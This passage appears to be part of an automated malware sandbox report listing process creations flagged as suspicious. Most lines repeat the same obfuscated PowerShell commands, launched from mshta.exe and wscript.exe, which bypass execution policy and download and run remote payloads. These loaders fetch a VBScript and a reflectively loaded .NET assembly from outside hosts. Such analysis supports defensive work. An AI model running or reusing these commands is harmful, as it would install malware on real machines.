cc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"Jump to behavior
